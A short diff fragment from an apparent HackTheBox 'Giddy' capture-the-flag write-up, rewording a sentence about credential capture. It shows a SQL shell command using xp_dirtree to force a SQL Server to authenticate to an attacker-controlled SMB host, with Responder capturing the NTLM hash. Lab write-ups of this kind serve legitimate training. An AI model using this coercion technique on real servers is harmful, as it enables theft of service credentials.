anthares101/write-ups-page/docs/HackTheBox/Giddy.md

 sql-shell> exec master.dbo.xp_dirtree '\\10.10.14.43\anything';
 ```

 What the above command does is connect to a SMB server that I control.
-Using Responder we can capture the NTLM hash that the SQL Server is gonna use to authenticate to it:
+Using Responder it is possible to capture the NTLM hash that the SQL Server is gonna use to authenticate to the SMB server:

 ```bash
 ┌──(kali㉿kali)-[~/Desktop]